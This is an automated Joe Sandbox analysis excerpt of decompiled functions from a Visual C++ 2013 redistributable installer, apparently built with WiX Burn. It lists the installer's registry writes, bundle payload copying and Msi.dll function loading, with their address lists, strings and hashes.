				if(_v8 != 0) {
					RegCloseKey(_v8);
					_v8 = 0;
				}
				if(_v12 != 0) {
					E012B01E8(_v12);
				}
				return _t61;
			}

0x01286aa5
0x01286aa5
0x01286aa8
0x01286aa9
0x01286aaa
0x01286aae
0x01286ab3
0x01286abf
0x01286ac3
0x01286ad8
0x01286ae0
0x01286ae4
0x01286afe
0x01286b0c
0x01286b10
0x01286b18
0x01286b1b
0x01286b29
0x01286b2d
0x00000000
0x01286b2f
0x01286b2f
0x01286b32
0x01286b40
0x01286b44
0x00000000
0x01286b46
0x01286b46
0x01286b49
0x01286b57
0x01286b5b
0x00000000
0x01286b5d
0x01286b5d
0x01286b5d
0x01286b65
0x01286b7c
0x01286b7c
0x01286b82
0x01286b90
0x01286b94
0x01286bf9
0x01286bf9
0x00000000
0x01286b96
0x01286b96
0x01286b99
0x01286bad
0x01286bb1
0x00000000
0x01286bb3
0x01286bb3
0x01286bc7
0x01286bcb
0x00000000
0x01286bcd
0x01286bcd
0x01286bdd
0x01286be1
0x00000000
0x01286be3
0x01286be3
0x01286bf3
0x01286bf7
0x00000000
0x00000000
0x01286bf7
0x01286be1
0x01286bcb
0x01286bb1
0x01286b67
0x01286b68
0x01286b76
0x01286b7a
0x00000000
0x00000000
0x00000000
0x00000000
0x01286b7a
0x01286b65
0x01286b5b
0x01286b44
0x01286b12
0x01286b12
0x01286b12
0x01286bfa
0x01286bfa
0x01286bff
0x01286c00
0x01286c05
0x01286ae6
0x01286ae6
0x00000000
0x01286ae6
0x01286ac5
0x01286ac5
0x01286aeb
0x01286aeb
0x01286aec
0x01286af2
0x01286c0e
0x01286c13
0x01286c19
0x01286c19
0x01286c1f
0x01286c24
0x01286c24
0x01286c2e

APIs

RegCloseKey.ADVAPI32(00000000), ref: 01286C13

Part of subcall function 012B3B02: RegSetValueExW.KERNELBASE(00020006,?,00000000,00000001,?,00000000,?,000000FF,00000000,00000001,?,?,0128698C,00000000,?,00020006), ref: 012B3B35

Strings

Publisher, xrefs: 01286B49, 01286B4E
Date, xrefs: 01286BB9
Failed to write %ls value., xrefs: 01286BFA
PackageName, xrefs: 01286B1B, 01286B20
InstallerName, xrefs: 01286BCD, 01286BD2, 01286BD3
InstalledDate, xrefs: 01286BB3, 01286BB8
Failed to get the formatted key path for update registration., xrefs: 01286AC5
PublishingGroup, xrefs: 01286B68, 01286B6D
InstalledBy, xrefs: 01286B99, 01286B9E
ThisVersionInstalled, xrefs: 01286AFE, 01286B03, 01286B12
LogonUser, xrefs: 01286B9F
ReleaseType, xrefs: 01286B82, 01286B87
PackageVersion, xrefs: 01286B32, 01286B37
Failed to create the key for update registration., xrefs: 01286AE6
InstallerVersion, xrefs: 01286BE3, 01286BE8, 01286BE9, 01286BF9
UninstallString, xrefs: 01286AB5

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseValue
String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled$UninstallString
API String ID: 3132538880-2375234059
Opcode ID: f7a5613f3fa3cc52c30d2fe1dc7e06defef217286efa3956295332e6a75c5030
Instruction ID: 3ee6ed654f45b69f7b80b7d304fae77edaa694e1aea2040a5036daecd9a5983b
Opcode Fuzzy Hash: f7a5613f3fa3cc52c30d2fe1dc7e06defef217286efa3956295332e6a75c5030
Instruction Fuzzy Hash: D741C276961606BBCB13BA558D81EEFBD7AEF807A4B220028F60477351EB31DD00A750

Uniqueness

Uniqueness Score: -1.00%

Function 012818B9 Relevance: 28.2, APIs: 4, Strings: 12, Instructions: 185
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E012818B9(void* __ecx, void* __edx, void* __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				signed int _t48;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				signed int _t59;
				signed int _t71;
				void* _t89;
				signed int _t96;
				void* _t98;

				_t98 = __esi;
				_t88 = __edx;
				_t86 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(_t89);
				_t82 = __esi + 0x88;
				_v12 = 1;
				if(E01291EFD(__esi + 0x88, __ecx, __edx, _t89, __esi, __esi + 0x3e4, _t82,  *((intOrPtr*)(__esi + 0x20)),  *((intOrPtr*)(__esi + 0x158))) >= 0) {
					_t48 = E01298282(__edx, __esi + 0xf8, _t82);
					__eflags = _t48;
					if(_t48 >= 0) {
						__eflags =  *((intOrPtr*)(__esi + 0x488)) - 1;
						if(__eflags != 0) {
							L11:
							_t83 = _t98 + 0x88;
							_t52 = E012973A8(_t88, __eflags, _t98 + 0x88, _t98 + 0xac,  *((intOrPtr*)(_t98 + 0x20)),  *((intOrPtr*)(_t98 + 0x158)), _t98 + 0xf4,  &_v12);
							__eflags = _t52;
							if(_t52 >= 0) {
								__eflags = _v12;
								if(_v12 != 0) {
									__eflags =  *(_t98 + 0xb8);
									if( *(_t98 + 0xb8) != 0) {
										__eflags =  *((intOrPtr*)(_t98 + 0x20)) - 2;
										if( *((intOrPtr*)(_t98 + 0x20)) > 2) {
											_t86 = _t98 + 0x34;
											E0129638E(_a4, 0, _t98 + 0x34);
										}
									}
									_t54 = E0129152B(_a4, _t98);
									__eflags = _t54;
									if(_t54 >= 0) {
										__eflags = E0128C28D(_t86, _t88, _t98);
										if(__eflags >= 0) {
											_t56 = E012932EE(_t88, __eflags,  *((intOrPtr*)(_t98 + 0x1c)), _t83);
											__eflags = _t56;
											if(_t56 >= 0) {
												_t96 = E01286782(_t86, _t88, _t98 + 0xf8, _t83);
												__eflags = _t96;
												if(_t96 >= 0) {
													_t59 =  *(_t98 + 0x40);
													__eflags = _t59;
													if(_t59 == 0) {
														while(1) {
															L30:
															_a4 = _a4 & 0x00000000;
															_t96 = E01281762(_t98,  &_a4);
															__eflags = _t96;
															if(_t96 < 0) {
																break;
															}
															__eflags = _a4;
															if(_a4 != 0) {
																continue;
															}
															goto L36;
														}
														_push("Failed while running ");
														goto L34;
													}
													__eflags =  *_t59;
													if( *_t59 == 0) {
														goto L30;
													}
													_t96 = E0128A734(_t83, L"WixBundleLayoutDirectory", _t59, 0);
													__eflags = _t96;
													if(_t96 >= 0) {
														goto L30;
													}
													_push("Failed to set layout directory variable to value provided from command-line.");
													goto L34;
												}
												_push("Failed to set registration variables.");
												goto L34;
											}
											_push("Failed to set action variables.");
											goto L34;
										}
										_push("Failed to query registration.");
									} else {
										_push("Failed to create the message window.");
									}
									goto L34;
								}
								_push(0xe0000035);
								_push(2);
								E01281566();
								_t96 = 0;
								goto L35;
							}
							_push("Failed to check global conditions");
							goto L34;
						}
						_t85 = __esi + 0x494;
						_t96 = E012835A5(__esi, __esi + 0x494, 1,  &_v8);
						__eflags = _t96;
						if(_t96 >= 0) {
							_t96 = E01282BBB(_t85);
							__eflags = _t96;
							if(_t96 >= 0) {
								__eflags = _v8;
								if(__eflags != 0) {
									CloseHandle(_v8);
									_t14 =  &_v8;
									 *_t14 = _v8 & 0x00000000;
									__eflags =  *_t14;
								}
								goto L11;
							}
							_push("Failed to connect to elevated parent process.");
							goto L34;
						}
						_push("Failed to create pipes to connect to elevated parent process.");
						goto L34;
					}
					_push("Failed to initialize internal cache functionality.");
					goto L34;
				} else {
					_push("Failed to open log.");
					L34:
					_push(_t96);
					E012AFA86();
					L35:
					_pop(_t86);
					L36:
					E01291256(_t98);
					E0128B5E1(_t86, _t88, _t98, _t98 + 0x88);
					if( *((intOrPtr*)(_t98 + 0x4a4)) != 0xffffffff) {
						_t101 =  *((intOrPtr*)(_t98 + 0x488)) - 1;
						if( *((intOrPtr*)(_t98 + 0x488)) != 1) {
							_t71 = 0;
							__eflags = 0;
						} else {
							_t71 =  *((intOrPtr*)(_t98 + 0x18));
						}
						E012837BE(_t86, _t101, _t98 + 0x494,  *((intOrPtr*)(_t98 + 0xf4)), _t71);
					}
					if(IsWindow( *(_t98 + 0x34)) != 0) {
						PostMessageW( *(_t98 + 0x34), 0x10, 0, 0);
					}
					if(_v8 != 0) {
						CloseHandle(_v8);
					}
					return _t96;
				}
			}

0x012818b9
0x012818b9
0x012818b9
0x012818bc
0x012818bd
0x012818be
0x012818c3
0x012818ca
0x012818db
0x012818eb
0x012818ff
0x01281906
0x01281908
0x01281914
0x0128191b
0x01281968
0x01281982
0x0128198a
0x01281993
0x01281995
0x012819a1
0x012819a4
0x012819b9
0x012819bf
0x012819c1
0x012819c5
0x012819c7
0x012819cf
0x012819cf
0x012819c5
0x012819d8
0x012819df
0x012819e1
0x012819f5
0x012819f7
0x01281a04
0x01281a0b
0x01281a0d
0x01281a23
0x01281a25
0x01281a27
0x01281a30
0x01281a33
0x01281a35
0x01281a58
0x01281a58
0x01281a58
0x01281a67
0x01281a69
0x01281a6b
0x00000000
0x00000000
0x01281a6d
0x01281a71
0x00000000
0x00000000
0x00000000
0x01281a73
0x01281a75
0x00000000
0x01281a75
0x01281a37
0x01281a3b
0x00000000
0x00000000
0x01281a4b
0x01281a4d
0x01281a4f
0x00000000
0x00000000
0x01281a51
0x00000000
0x01281a51
0x01281a29
0x00000000
0x01281a29
0x01281a0f
0x00000000
0x01281a0f
0x012819f9
0x012819e3
0x012819e3
0x012819e3
0x00000000
0x012819e1
0x012819a6
0x012819ab
0x012819ad
0x012819b2
0x00000000
0x012819b2
0x01281997
0x00000000
0x01281997
0x01281923
0x0128192f
0x01281931
0x01281933
0x01281945
0x01281947
0x01281949
0x01281955
0x01281959
0x0128195e
0x01281964
0x01281964
0x01281964
0x01281964
0x00000000
0x01281959
0x0128194b
0x00000000
0x0128194b
0x01281935
0x00000000
0x01281935
0x0128190a
0x00000000
0x012818ed
0x012818ed
0x01281a7a
0x01281a7a
0x01281a7b
0x01281a80
0x01281a81
0x01281a82
0x01281a83
0x01281a8f
0x01281a9b
0x01281a9d
0x01281aa4
0x01281aab
0x01281aab
0x01281aa6
0x01281aa6
0x01281aa6
0x01281abb
0x01281abb
0x01281acb
0x01281ad6
0x01281ad6
0x01281ae0
0x01281ae5
0x01281ae5
0x01281af0
0x01281af0

APIs

IsWindow.USER32(?), ref: 01281AC3
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 01281AD6
CloseHandle.KERNEL32(00000000,?,?,?,01281E12,?), ref: 01281AE5

Strings

Failed to set layout directory variable to value provided from command-line., xrefs: 01281A51
Failed to open log., xrefs: 012818ED
Failed to initialize internal cache functionality., xrefs: 0128190A
Failed to create pipes to connect to elevated parent process., xrefs: 01281935
Failed to set registration variables., xrefs: 01281A29
Failed to check global conditions, xrefs: 01281997
Failed while running , xrefs: 01281A75
Failed to create the message window., xrefs: 012819E3
WixBundleLayoutDirectory, xrefs: 01281A40
Failed to connect to elevated parent process., xrefs: 0128194B
Failed to query registration., xrefs: 012819F9
Failed to set action variables., xrefs: 01281A0F

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandleMessagePostWindow
String ID: Failed to check global conditions$Failed to connect to elevated parent process.$Failed to create pipes to connect to elevated parent process.$Failed to create the message window.$Failed to initialize internal cache functionality.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3586352542-3026528549
Opcode ID: d3b7f160c8fd832e97503cf2ace9e11cb8b4babfe12f785d2f7bc3bb68ec8e7a
Instruction ID: b69dbaf8cddd77e787d0e8705b68f9248740c0c9aaea77da1877ebd9c2aa2d33
Opcode Fuzzy Hash: d3b7f160c8fd832e97503cf2ace9e11cb8b4babfe12f785d2f7bc3bb68ec8e7a
Instruction Fuzzy Hash: 1251B371172B06BEDB22FA64C885FFAB7E9AF40350F104429E55A931C0EB70E666C720

Uniqueness

Uniqueness Score: -1.00%

Function 012A4415 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E012A4415(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				signed int _v12;
				intOrPtr _t120;
				intOrPtr _t130;
				intOrPtr _t132;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t140;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr* _t165;
				intOrPtr _t168;
				intOrPtr _t178;
				signed int _t181;
				intOrPtr _t190;
				intOrPtr* _t200;
				intOrPtr* _t204;
				intOrPtr _t206;
				intOrPtr _t208;
				void* _t209;

				_t183 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__edi);
				_t200 = _a24;
				_t178 = 1;
				_t120 = E012B233B( *(_t200 + 0x80) << 3, 1);
				_t206 = _a4;
				 *((intOrPtr*)(_t206 + 0x7c)) = _t120;
				if(_t120 != 0) {
					_v12 = _v12 & 0x00000000;
					 *(_t206 + 0x80) =  *(_t200 + 0x80);
					if( *(_t200 + 0x80) <= 0) {
						L14:
						 *(_t206 + 0x14) =  *(_t206 + 0x14) & 0x00000000;
						 *((intOrPtr*)(_t206 + 0xa8)) = _t178;
						 *((intOrPtr*)(_t206 + 0x8c)) =  *((intOrPtr*)(_t200 + 0x8c));
						 *((intOrPtr*)(_t206 + 0x40)) =  *((intOrPtr*)(_t200 + 0x40));
						 *((intOrPtr*)(_t206 + 0x44)) =  *((intOrPtr*)(_t200 + 0x44));
						 *((intOrPtr*)(_t206 + 0x28)) =  *((intOrPtr*)(_t200 + 0x28));
						 *((intOrPtr*)(_t206 + 0x2c)) =  *((intOrPtr*)(_t200 + 0x2c));
						 *((intOrPtr*)(_t206 + 0x30)) =  *((intOrPtr*)(_t200 + 0x30));
						 *((intOrPtr*)(_t206 + 0x34)) =  *((intOrPtr*)(_t200 + 0x34));
						 *((intOrPtr*)(_t206 + 0x1c)) =  *((intOrPtr*)(_t200 + 0x1c));
						_t130 = E012B1171(_t183, _t198, _t206,  *_t200, 0);
						_a4 = _t130;
						if(_t130 >= 0) {
							_t132 = E012B1171(_t183, _t198, _t206 + 0x24,  *((intOrPtr*)(_t200 + 0x24)), 0);
							_a4 = _t132;
							if(_t132 >= 0) {
								 *((intOrPtr*)(_t206 + 0xb0)) =  *((intOrPtr*)(_t200 + 0xb0));
								_t136 = E0128BE50(_t183, _t200,  &_v8,  *_a8,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(_a8 + 8)),  *((intOrPtr*)(_a8 + 0x1c)), _t178, _a16, _a20, _a12,  *((intOrPtr*)(_t134 + 0xc)));
								_a4 = _t136;
								if(_t136 >= 0) {
									_t138 = E012B1171(_t183, _t198, _t206 + 0x94, _v8, 0);
									_a4 = _t138;
									if(_t138 >= 0) {
										_t140 = E012B1171(_t183, _t198, _t206 + 0x98, _v8, 0);
										_a4 = _t140;
										if(_t140 >= 0) {
											 *((intOrPtr*)(_t206 + 0xac)) = _t178;
											_t140 = E012B1171(_t183, _t198, _t206 + 0x9c, _v8, 0);
											_a4 = _t140;
											if(_t140 >= 0) {
												 *((intOrPtr*)(_t206 + 0x18)) = _t178;
											} else {
												_push("Failed to copy uninstall arguments for passthrough bundle package");
												goto L33;
											}
										} else {
											_push("Failed to copy related arguments for passthrough bundle package");
											goto L33;
										}
									} else {
										_push("Failed to copy install arguments for passthrough bundle package");
										goto L33;
									}
								} else {
									_push("Failed to recreate command-line arguments.");
									goto L33;
								}
							} else {
								_push("Failed to copy cache id for passthrough pseudo bundle.");
								goto L33;
							}
						} else {
							_push("Failed to copy key for passthrough pseudo bundle.");
							goto L33;
						}
					} else {
						while(1) {
							_t181 = _v12 << 3;
							_t204 =  *((intOrPtr*)(_t200 + 0x7c)) + _t181;
							 *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c)))) = E012B233B(0x58, 1);
							_t147 =  *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c))));
							if(_t147 == 0) {
								break;
							}
							 *((intOrPtr*)(_t147 + 4)) =  *((intOrPtr*)( *_t204 + 4));
							_t149 =  *_t204;
							_t198 =  *((intOrPtr*)(_t149 + 0x10));
							_t190 =  *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c))));
							 *((intOrPtr*)(_t190 + 0x10)) =  *((intOrPtr*)(_t149 + 0x10));
							 *((intOrPtr*)(_t190 + 0x14)) =  *((intOrPtr*)(_t149 + 0x14));
							_t140 = E012B1171(_t190,  *((intOrPtr*)(_t149 + 0x10)),  *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c)))),  *((intOrPtr*)( *_t204)), 0);
							_a4 = _t140;
							if(_t140 < 0) {
								_push("Failed to copy key for passthrough pseudo bundle payload.");
								goto L33;
							} else {
								_t140 = E012B1171(_t190, _t198,  *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c)))) + 0x18,  *((intOrPtr*)( *_t204 + 0x18)), 0);
								_a4 = _t140;
								if(_t140 < 0) {
									_push("Failed to copy filename for passthrough pseudo bundle.");
									goto L33;
								} else {
									_t140 = E012B1171(_t190, _t198,  *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c)))) + 0x38,  *((intOrPtr*)( *_t204 + 0x38)), 0);
									_a4 = _t140;
									if(_t140 < 0) {
										_push("Failed to copy local source path for passthrough pseudo bundle.");
										goto L33;
									} else {
										_t162 =  *((intOrPtr*)( *_t204 + 0x40));
										if( *((intOrPtr*)( *_t204 + 0x40)) == 0) {
											L9:
											_t163 =  *_t204;
											if( *((intOrPtr*)( *_t204 + 0x30)) == 0) {
												L12:
												_v12 = _v12 + 1;
												 *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c)) + 4)) =  *((intOrPtr*)(_t204 + 4));
												_t165 = _a24;
												_t183 = _v12;
												_t200 = _t165;
												if(_v12 <  *((intOrPtr*)(_t165 + 0x80))) {
													continue;
												} else {
													_t178 = 1;
													goto L14;
												}
											} else {
												 *((intOrPtr*)( *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c)))) + 0x30)) = E012B233B( *((intOrPtr*)(_t163 + 0x34)), 0);
												_t168 =  *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c))));
												if( *((intOrPtr*)(_t168 + 0x30)) == 0) {
													_t208 = 0x8007000e;
													_a4 = 0x8007000e;
													E012B294E(_t168, "pseudobundle.cpp", 0xcd, 0x8007000e);
													_push("Failed to allocate memory for pseudo bundle payload hash.");
													goto L22;
												} else {
													 *((intOrPtr*)(_t168 + 0x34)) =  *((intOrPtr*)( *_t204 + 0x34));
													E012A8221( *((intOrPtr*)( *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c)))) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c)))) + 0x34)),  *((intOrPtr*)( *_t204 + 0x30)),  *((intOrPtr*)( *_t204 + 0x34)));
													_t209 = _t209 + 0x10;
													goto L12;
												}
											}
										} else {
											_t140 = E012B1171(_t190, _t198,  *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t206 + 0x7c)))) + 0x40, _t162, 0);
											_a4 = _t140;
											if(_t140 < 0) {
												_push("Failed to copy download source for passthrough pseudo bundle.");
												L33:
												_push(_t140);
												goto L34;
											} else {
												goto L9;
											}
										}
									}
								}
							}
							goto L36;
						}
						_t208 = 0x8007000e;
						_a4 = 0x8007000e;
						E012B294E(_t147, "pseudobundle.cpp", 0xb7, 0x8007000e);
						_push("Failed to allocate space for burn payload inside of related bundle struct");
						goto L22;
					}
				} else {
					_t208 = 0x8007000e;
					_a4 = 0x8007000e;
					E012B294E(_t120, "pseudobundle.cpp", 0xaf, 0x8007000e);
					_push("Failed to allocate space for burn package payload inside of passthrough bundle.");
					L22:
					_push(_t208);
					L34:
					E012AFA86();
				}
				L36:
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _a4;
			}

0x012a4415
0x012a4418
0x012a4419
0x012a441a
0x012a4420
0x012a4421
0x012a442c
0x012a4432
0x012a4437
0x012a443a
0x012a443f
0x012a4469
0x012a446d
0x012a447a
0x012a45bb
0x012a45bb
0x012a45bf
0x012a45cb
0x012a45d4
0x012a45da
0x012a45e0
0x012a45e6
0x012a45ec
0x012a45f2
0x012a45fa
0x012a4600
0x012a4605
0x012a460a
0x012a4689
0x012a468e
0x012a4693
0x012a46a5
0x012a46ca
0x012a46d1
0x012a46d6
0x012a46ea
0x012a46ef
0x012a46f4
0x012a4708
0x012a470d
0x012a4712
0x012a4726
0x012a472c
0x012a4731
0x012a4736
0x012a4747
0x012a4738
0x012a4738
0x00000000
0x012a4738
0x012a4714
0x012a4714
0x00000000
0x012a4714
0x012a46f6
0x012a46f6
0x00000000
0x012a46f6
0x012a46d8
0x012a46d8
0x00000000
0x012a46d8
0x012a4695
0x012a4695
0x00000000
0x012a4695
0x012a460c
0x012a460c
0x00000000
0x012a460c
0x012a4480
0x012a4480
0x012a4488
0x012a448d
0x012a4497
0x012a449d
0x012a44a2
0x00000000
0x00000000
0x012a44ad
0x012a44b0
0x012a44b5
0x012a44b8
0x012a44bb
0x012a44c1
0x012a44d0
0x012a44d5
0x012a44da
0x012a4635
0x00000000
0x012a44e0
0x012a44f1
0x012a44f6
0x012a44fb
0x012a463f
0x00000000
0x012a4501
0x012a4512
0x012a4517
0x012a451c
0x012a4649
0x00000000
0x012a4522
0x012a4524
0x012a4529
0x012a4548
0x012a4548
0x012a454e
0x012a4597
0x012a459d
0x012a45a0
0x012a45a4
0x012a45a7
0x012a45aa
0x012a45b2
0x00000000
0x012a45b8
0x012a45ba
0x00000000
0x012a45ba
0x012a4550
0x012a4560
0x012a4566
0x012a456d
0x012a465d
0x012a466d
0x012a4670
0x012a4675
0x00000000
0x012a4573
0x012a4578
0x012a458f
0x012a4594
0x00000000
0x012a4594
0x012a456d
0x012a452b
0x012a4538
0x012a453d
0x012a4542
0x012a4653
0x012a473d
0x012a473d
0x00000000
0x00000000
0x00000000
0x00000000
0x012a4542
0x012a4529
0x012a451c
0x012a44fb
0x00000000
0x012a44da
0x012a4616
0x012a4626
0x012a4629
0x012a462e
0x00000000
0x012a462e
0x012a4441
0x012a4441
0x012a4451
0x012a4454
0x012a4459
0x012a467a
0x012a467a
0x012a473e
0x012a473e
0x012a4744
0x012a474a
0x012a4751
0x012a4756
0x012a4756
0x012a475f

APIs

Part of subcall function 012B233B: GetProcessHeap.KERNEL32(?,00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B234C
Part of subcall function 012B233B: RtlAllocateHeap.NTDLL(00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B2353

_memcpy_s.LIBCMT ref: 012A458F

Strings

Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 012A4459
Failed to copy key for passthrough pseudo bundle payload., xrefs: 012A4635
Failed to copy filename for passthrough pseudo bundle., xrefs: 012A463F
Failed to recreate command-line arguments., xrefs: 012A46D8
Failed to copy install arguments for passthrough bundle package, xrefs: 012A46F6
Failed to copy cache id for passthrough pseudo bundle., xrefs: 012A4695
Failed to allocate memory for pseudo bundle payload hash., xrefs: 012A4675
pseudobundle.cpp, xrefs: 012A444C, 012A4621, 012A4668
Failed to copy uninstall arguments for passthrough bundle package, xrefs: 012A4738
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 012A462E
Failed to copy local source path for passthrough pseudo bundle., xrefs: 012A4649
Failed to copy related arguments for passthrough bundle package, xrefs: 012A4714
Failed to copy key for passthrough pseudo bundle., xrefs: 012A460C
Failed to copy download source for passthrough pseudo bundle., xrefs: 012A4653

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$AllocateProcess_memcpy_s
String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
API String ID: 1343786421-115096447
Opcode ID: 9bd4d4a2785bb57d83e02c2a209aa72f9a6ea91ed06d2cd992e68162b46d3f33
Instruction ID: 9da1d01a685998be5f701c528b3a572744fa36eea97833490870e86b12a3e65a
Opcode Fuzzy Hash: 9bd4d4a2785bb57d83e02c2a209aa72f9a6ea91ed06d2cd992e68162b46d3f33
Instruction Fuzzy Hash: 2DB19974660B46EFCB11DF68C880F6ABBE5BF08744F54856DEA199B221D7B0F911CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012B3D19 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 66
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B3D19(void* __eflags) {
				_Unknown_base(*)()* _t3;
				_Unknown_base(*)()* _t4;
				_Unknown_base(*)()* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				void* _t10;
				_Unknown_base(*)()* _t17;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				_Unknown_base(*)()* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t10 = E012B2A2D(L"Msi.dll", 0x12d5e34);
				if(_t10 >= 0) {
					_t3 = GetProcAddress( *0x12d5e34, "MsiDeterminePatchSequenceW");
					 *0x12d5e38 = _t3;
					_t17 =  *0x12d5e18; // 0x6d9abe10
					if(_t17 == 0) {
						 *0x12d5e18 = _t3;
					}
					_t4 = GetProcAddress( *0x12d5e34, "MsiDetermineApplicablePatchesW");
					 *0x12d5e3c = _t4;
					_t18 =  *0x12d5e1c; // 0x6d9aa130
					if(_t18 == 0) {
						 *0x12d5e1c = _t4;
					}
					_t5 = GetProcAddress( *0x12d5e34, "MsiEnumProductsExW");
					 *0x12d5e40 = _t5;
					_t19 =  *0x12d5e20; // 0x6d9b03d0
					if(_t19 == 0) {
						 *0x12d5e20 = _t5;
					}
					_t6 = GetProcAddress( *0x12d5e34, "MsiGetPatchInfoExW");
					 *0x12d5e44 = _t6;
					_t20 =  *0x12d5e24; // 0x6d9b3560
					if(_t20 == 0) {
						 *0x12d5e24 = _t6;
					}
					_t7 = GetProcAddress( *0x12d5e34, "MsiGetProductInfoExW");
					 *0x12d5e48 = _t7;
					_t21 =  *0x12d5e28; // 0x6d8dac90
					if(_t21 == 0) {
						 *0x12d5e28 = _t7;
					}
					_t8 = GetProcAddress( *0x12d5e34, "MsiSetExternalUIRecord");
					 *0x12d5e4c = _t8;
					_t22 =  *0x12d5e2c; // 0x6d9b71b0
					if(_t22 == 0) {
						 *0x12d5e2c = _t8;
					}
					_t9 = GetProcAddress( *0x12d5e34, "MsiSourceListAddSourceExW");
					 *0x12d5e50 = _t9;
					_t23 =  *0x12d5e30; // 0x6d9b7ec0
					if(_t23 == 0) {
						 *0x12d5e30 = _t9;
					}
					 *0x12d5e54 = 1;
				}
				return _t10;
			}

0x012b3d2a
0x012b3d30
0x012b3d48
0x012b3d4a
0x012b3d4f
0x012b3d55
0x012b3d57
0x012b3d57
0x012b3d67
0x012b3d69
0x012b3d6e
0x012b3d74
0x012b3d76
0x012b3d76
0x012b3d86
0x012b3d88
0x012b3d8d
0x012b3d93
0x012b3d95
0x012b3d95
0x012b3da5
0x012b3da7
